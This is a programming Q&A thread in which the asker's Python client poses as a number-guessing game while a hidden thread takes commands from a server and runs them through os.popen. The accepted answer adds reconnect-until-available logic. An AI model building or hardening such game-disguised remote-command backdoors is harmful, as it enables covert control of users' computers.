# How can I have client socket continue listening for server in python?

Tags: python, python-3.x, sockets, port

I have the following code.

This is for the client.py:

```
import random
import socket
import threading
import os


def access():
    HOST = '127.0.0.1'
    PORT = 22262

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((HOST, PORT))

    cmd_mode = False

    while True:
        command = client.recv(1024).decode('utf-8')
        if command == 'cmdon':
            cmd_mode = True
            client.send('You now have terminal access!'.encode('utf-8'))
            continue
        if command == 'cmdoff':
            cmd_mode = False
        if cmd_mode:
            os.popen(command)
        if command == 'hello':
            print('Hello World!')
        client.send(f'{command} was exectued successfully!'.encode('utf-8'))


def game():
    number = random.randint(0, 1000)
    tries = 1
    done = False

    while not done:
        guess = int(input('Enter a guess: '))

        if guess == number:
            done = True
            print('You won!')
        else:
            tries += 1
            if guess > number:
                print('The actual number is smaller.')
            else:
                print('The actual number is larger.')
        print(f'You need {tries} tries!')


t1 = threading.Thread(target=game)
t2 = threading.Thread(target=access)

t1.start()
t2.start()
```

This for server.py

```
import socket

HOST = '127.0.0.1'
PORT = 22262

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))

server.listen()

client, address = server.accept()

while True:
    print(f'Connected to {address}')
    cmd_input = input('Enter a command: ')
    client.send(cmd_input.encode('utf-8'))
    print(client.recv(1024).decode('utf-8'))
```

For this to work properly I need to have the server continually running to get a response from the client. If I run the client before the server I get presented with the following error:

```
ConnectionRefusedError: [WinError 10061] No connection could be made because the target machine actively refused it
```

Can I modify  it to have client.py wait for the server to answer in order to connect to it? Basically I want to remove the time out error

Comment: Put `client.connect((HOST, PORT))` in a `try/except` block. If an `Exception` is caught, retry.

Comment: Can you put that in code form please? I'm fairly new to python and I can't really code well

Answer (score 1, accepted):

`connect()` will throw an exception if it can't connect. Catch it and retry:

```
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
    try:
        client.connect((HOST, PORT))
        break
    except Exception as e:
        print("retrying: ", e);
        time.sleep(1)
print("connected")
```